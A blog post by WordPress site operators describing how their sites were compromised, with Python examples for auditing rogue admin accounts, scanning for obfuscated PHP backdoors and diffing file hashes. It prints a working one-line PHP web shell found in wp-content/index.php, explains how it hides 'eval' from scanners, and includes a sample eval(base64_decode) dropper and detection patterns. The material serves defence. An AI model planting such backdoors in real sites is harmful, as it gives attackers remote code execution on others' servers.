We run several WordPress websites in different categories, everything from blogs to online shops. WordPress is great: easy and powerful at the same time. There is one thing, though, that makes us doubt the platform: our WordPress websites get hacked, especially the more popular ones.
Attackers use a range of techniques to give themselves access they were never granted. In this post we share our most recent experiences with our hacked WordPress sites.
One of the most obvious attacks on our blog was new users appearing in the wp_users table. They mostly had the usernames "admin" and "administrator" and empty or made-up email addresses. We never created them, and registrations are disabled on the site, so that alone told us the site had been compromised. Here are the ones we got last time:
Simply deleting these users did not help much; they were back a few days later.
To deal with it, we demoted the new users to the Subscriber role and changed their passwords and email addresses, so every value the attackers had inserted into the database was overwritten with our own. Accounts that keep coming back are a symptom rather than the problem: something with write access to the database (a vulnerable plugin, a leftover backdoor file or stolen credentials) is re-creating them, and demoting the accounts does not remove that.
We never found the root cause; it was most likely a vulnerability in a plugin or theme. The problem went away after a while.
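To make the check described above repeatable, here is an added example (not code from the original post) that lists every account holding the administrator capability, flags the ones you did not create, and demotes them the way the post did. It uses an in-memory SQLite copy of the two relevant tables, wp_users and wp_usermeta, filled with constructed rows so it runs offline; the wp_ table prefix and the allow-list of known administrators are assumptions, and against a live site the same two queries would be run on MySQL.

```python
"""Audit a WordPress database for administrator accounts you did not create.

Added example, not code from the original post. The two tables are recreated
in an in-memory SQLite database with constructed sample rows.
"""
import sqlite3

TABLE_PREFIX = "wp_"        # assumption: the default prefix; change if yours differs
KNOWN_ADMINS = {"owner"}    # assumption: the administrator accounts you created yourself
CAPS_KEY = TABLE_PREFIX + "capabilities"   # WordPress stores the role under this meta key

# Constructed sample data: one legitimate admin, one editor, and two rogue
# accounts of the kind the post describes (generic name, junk or empty e-mail).
SAMPLE_USERS = [
    (1, "owner", "owner@example.com", "2015-03-01 10:00:00"),
    (2, "editor_jane", "jane@example.com", "2016-01-12 09:30:00"),
    (3, "admin", "", "2016-05-02 03:14:07"),
    (4, "administrator", "no@no.no", "2016-05-02 03:14:09"),
]
# The role is a PHP-serialized array, e.g. a:1:{s:13:"administrator";b:1;}
SAMPLE_META = [
    (1, CAPS_KEY, 'a:1:{s:13:"administrator";b:1;}'),
    (2, CAPS_KEY, 'a:1:{s:6:"editor";b:1;}'),
    (3, CAPS_KEY, 'a:1:{s:13:"administrator";b:1;}'),
    (4, CAPS_KEY, 'a:1:{s:13:"administrator";b:1;}'),
]


def build_sample_db():
    """Create wp_users and wp_usermeta (the columns the audit needs) in memory."""
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE {TABLE_PREFIX}users (
            ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT, user_registered TEXT);
        CREATE TABLE {TABLE_PREFIX}usermeta (
            umeta_id INTEGER PRIMARY KEY AUTOINCREMENT, user_id INTEGER,
            meta_key TEXT, meta_value TEXT);
    """)
    con.executemany(f"INSERT INTO {TABLE_PREFIX}users VALUES (?,?,?,?)", SAMPLE_USERS)
    con.executemany(
        f"INSERT INTO {TABLE_PREFIX}usermeta (user_id, meta_key, meta_value) VALUES (?,?,?)",
        SAMPLE_META)
    return con


def list_admins(con):
    """(ID, login, email, registered) for every account whose capabilities
    blob grants 'administrator'. The prefix is our constant, not user input."""
    sql = f"""
        SELECT u.ID, u.user_login, u.user_email, u.user_registered
        FROM {TABLE_PREFIX}users u
        JOIN {TABLE_PREFIX}usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = ? AND m.meta_value LIKE '%"administrator"%'
        ORDER BY u.ID"""
    return con.execute(sql, (CAPS_KEY,)).fetchall()


def rogue_admins(con, known=KNOWN_ADMINS):
    """Administrators not on the allow-list, each with the hints the post relied on."""
    out = []
    for uid, login, email, registered in list_admins(con):
        if login in known:
            continue
        flags = []
        if "@" not in email:
            flags.append("no e-mail address")
        if login.lower() in {"admin", "administrator"}:
            flags.append("generic admin name")
        out.append((uid, login, email, registered, flags))
    return out


def demote_to_subscriber(con, user_ids):
    """What the post did: drop the rogue accounts to 'subscriber'. Passwords and
    e-mails were changed separately. Returns the number of rows updated."""
    subscriber = 'a:1:{s:10:"subscriber";b:1;}'
    cur = con.executemany(
        f"UPDATE {TABLE_PREFIX}usermeta SET meta_value = ? WHERE meta_key = ? AND user_id = ?",
        [(subscriber, CAPS_KEY, uid) for uid in user_ids])
    con.commit()
    return cur.rowcount


if __name__ == "__main__":
    con = build_sample_db()
    rogue = rogue_admins(con)
    for row in rogue:
        print("rogue admin:", row)
    demote_to_subscriber(con, [r[0] for r in rogue])
    print("admins left:", [r[1] for r in list_admins(con)])
```

Run this against the real database on a schedule and alert when the list of administrators differs from the allow-list, not only when a login looks suspicious; a second wave may use a less obvious username.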
Sometimes we find files that were changed without our consent and without us noticing right away. On closer inspection the injected code is rarely something we can spot at a glance. We often end up reinstalling all WordPress core files, just to be sure no surprises are hidden in them, and removing files that are not supposed to be there. But sometimes the changes we find are ingenious (and obfuscated)!
The easiest way to backdoor a website is to drop in a call to eval(), usually wrapped around base64_decode() so the payload is not readable. Once it is in place, the attacker sends his own PHP in a request parameter and the server runs it. The problem, for the attacker, is that everybody knows this, and most protection software and security plugins flag a literal eval() or base64_decode() right away. That is where the ingenuity comes in: how do you hide it?
The last time we spotted new code, it was in the index.php inside the wp-content folder (wp-content/index.php). That file is normally empty apart from the comment "Silence is golden". This time it contained the following snippet:
<?php 'v1'; $e = ' avel'; $f = create_function('', $e{3}.$e{2}.$e{1}.$e{4} .'( stripslashes( @ $_REQUEST["FFfertrNTAoTgRLOacet"] ) );' ); $f();
The line was inserted while we were testing some new plugins on our beta site, which is actually closed to the outside world by .htaccess directives. Could one of the plugins have inserted the code? Maybe. Inspecting the plugins involved turned up nothing. It could have been anything.
If you look at this code, it is actually rather clever. The string ' avel' holds the letters of the function name in scrambled order, and $e{3}.$e{2}.$e{1}.$e{4} reassembles them at run time (positions 3, 2, 1 and 4 are e, v, a, l) into "eval", so the word never appears in the file. create_function() then compiles the string 'eval( stripslashes( @ $_REQUEST["FFfertrNTAoTgRLOacet"] ) );' into an anonymous function, and $f() calls it. The result is a one-line web shell: any PHP sent in the FFfertrNTAoTgRLOacet request parameter, as a GET or POST field, is executed, and the @ suppresses the notice on every ordinary request where the parameter is absent, so the file stays quiet. (create_function() itself relies on eval internally; it was deprecated in PHP 7.2 and removed in PHP 8.0, as was the curly-brace string offset syntax, so on a current PHP this snippet would simply fail.)
As it is explained here, scanning such code with antivirus software gives you no warnings: signature-based scanners look for the literal strings eval( and base64_decode(, and neither occurs in the file.
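An added example (not code from the original post, and not any of the scanners it refers to) of what a scan has to look for instead. Rather than the literal word eval, it checks for the building blocks the snippet above uses: create_function(), a name assembled from single string offsets, and request data fed straight into a decoder, plus the byte-exact comparison that a near-empty file like wp-content/index.php allows. The three sample files are constructed inline, one of them the exact snippet from the post, and the stock content of wp-content/index.php is assumed to be the two-line "Silence is golden" placeholder.

```python
"""Heuristic scan for obfuscated PHP backdoors like the wp-content/index.php one.

Added example, not from the original post or any scanner it mentions. The
sample files below are constructed inline so the script runs offline.
"""
import re

# (rule name, pattern, why it matters)
RULES = [
    ("literal-eval", re.compile(r"\b(eval|assert)\s*\("),
     "direct eval/assert call, what a grep-based scanner already finds"),
    ("decoder", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
     "payload decoder typical of eval(base64_decode(...)) droppers"),
    ("create_function", re.compile(r"\bcreate_function\s*\("),
     "create_function() compiles its string argument with eval internally"),
    ("char-assembly", re.compile(r"(\$\w+\s*[\{\[]\s*\d+\s*[\}\]]\s*\.\s*){2,}"),
     "a name built from single string offsets, e.g. $e{3}.$e{2}.$e{1}.$e{4}"),
    ("superglobal-to-code", re.compile(
        r"(stripslashes|base64_decode|eval)\s*\(\s*@?\s*\$_(REQUEST|GET|POST|COOKIE)\b"),
     "request data passed straight into a decoder or eval"),
    ("silenced-superglobal", re.compile(r"@\s*\$_(REQUEST|GET|POST|COOKIE)\b"),
     "@ hides the notice when the trigger parameter is absent"),
]

# Assumption: stock content of wp-content/index.php in a clean install.
STOCK_WP_CONTENT_INDEX = "<?php\n// Silence is golden.\n"

# Constructed samples. The second one is the snippet quoted in the post.
SAMPLES = {
    "wp-content/index.php (stock)": STOCK_WP_CONTENT_INDEX,
    "wp-content/index.php (from the post)": (
        "<?php 'v1'; $e = ' avel'; $f = create_function('', "
        "$e{3}.$e{2}.$e{1}.$e{4} .'( stripslashes( @ $_REQUEST[\"FFfertrNTAoTgRLOacet\"] ) );' ); $f();"
    ),
    "classic dropper (constructed)": "<?php eval(base64_decode($_POST['p']));",
}


def scan(php_source):
    """Names of every rule that fires on one file's source, in RULES order."""
    return [name for name, rx, _ in RULES if rx.search(php_source)]


def is_stock_placeholder(php_source):
    """wp-content/index.php should match the stock placeholder byte for byte
    (ignoring trailing whitespace); anything else there deserves a look."""
    return php_source.strip() == STOCK_WP_CONTENT_INDEX.strip()


def resolve_offsets(literal, offsets):
    """Replay the string-offset trick by hand: ' avel' with 3,2,1,4 gives 'eval'."""
    return "".join(literal[i] for i in offsets)


if __name__ == "__main__":
    print("the snippet builds:", resolve_offsets(" avel", [3, 2, 1, 4]))
    for label, src in SAMPLES.items():
        hits = scan(src)
        grep_would_catch = "literal-eval" in hits or "decoder" in hits
        print(f"{label}: rules={hits} grep-for-eval-catches={grep_would_catch}")
        if label.startswith("wp-content/index.php"):
            print("   stock placeholder:", is_stock_placeholder(src))
```

The post's snippet trips four rules while a grep for eval( or base64_decode( finds nothing in it; the constructed dropper trips the literal rules as well. Heuristics like these produce false positives in legitimate plugin code, so treat a hit as a file to read, not as proof, and let the byte-exact check carry the weight for files whose correct content is known.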
We discover new files in our WordPress installations roughly once a year, and they usually appear without us noticing. Keeping the site in a version control system like Git and reviewing all new changes from time to time helps spot the problem early.
When you find new files, reinstall WordPress from a fresh download of the newest version. Remove all plugins you do not need. Inspect all of your own files for changes around the time the site was hacked, and go through the web server logs from around the time the file was modified to find the request that planted it. If something was able to write files, assume every password and secret on the site is known to the attacker and change them.
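For sites that are not kept in Git, here is an added example (not the post's code) of the baseline-and-compare approach the post applies by hand: hash every file after a clean install, keep the hashes somewhere the web server cannot write, and later list the files that were added, changed or removed. The demo builds a small constructed tree in a temporary directory so it runs anywhere; the set of skipped directories (uploads, cache) is an assumption.

```python
"""Baseline-and-diff integrity check for a WordPress tree.

Added example, not from the original post. demo() builds a constructed tree
in a temporary directory, takes a baseline, simulates the two findings the
post describes (a rewritten placeholder and a dropped file) and reports them.
"""
import hashlib
import json
import tempfile
from pathlib import Path

# Assumption: directories that change legitimately and hold no code of ours.
SKIP_DIRS = {"wp-content/uploads", "wp-content/cache"}


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map relative POSIX path -> sha256 for every regular file under root."""
    root = Path(root)
    result = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if any(rel == d or rel.startswith(d + "/") for d in SKIP_DIRS):
            continue
        result[rel] = sha256_of(path)
    return result


def diff_snapshots(baseline, current):
    """Return (added, modified, removed) as sorted lists of relative paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return added, modified, removed


def save_baseline(snap, path):
    # On a real site write this outside the web root, on a host the site cannot write to.
    Path(path).write_text(json.dumps(snap, indent=1, sort_keys=True))


def load_baseline(path):
    return json.loads(Path(path).read_text())


def demo():
    """Constructed scenario: clean tree, baseline, then tampering, then the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "site"
        (root / "wp-content" / "uploads").mkdir(parents=True)
        (root / "index.php").write_text("<?php require 'wp-blog-header.php';\n")
        (root / "wp-content" / "index.php").write_text("<?php\n// Silence is golden.\n")
        (root / "wp-content" / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8 constructed")
        baseline_file = Path(tmp) / "baseline.json"
        save_baseline(snapshot(root), baseline_file)

        # Later: the placeholder is rewritten, a file is dropped, and an upload
        # is added (the upload must not show up because uploads are skipped).
        (root / "wp-content" / "index.php").write_text("<?php $f = create_function('', 'x'); $f();")
        (root / "wp-content" / "wp-cache.php").write_text("<?php // not ours\n")
        (root / "wp-content" / "uploads" / "new.jpg").write_bytes(b"\xff\xd8 ignored")

        return diff_snapshots(load_baseline(baseline_file), snapshot(root))


if __name__ == "__main__":
    added, modified, removed = demo()
    print("added:   ", added)
    print("modified:", modified)
    print("removed: ", removed)
```

Take a fresh baseline after every legitimate update, and use the modification times of the files the diff reports to pick the window of server log to read, which is the second step the post recommends.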
We will update if we’re hacked again.
Update
About 6 months ago we decided to try out the Wordfence plugin for WordPress. It worked well for our blog-type website, but it slowed our eCommerce stores, which have a lot of images, down horribly.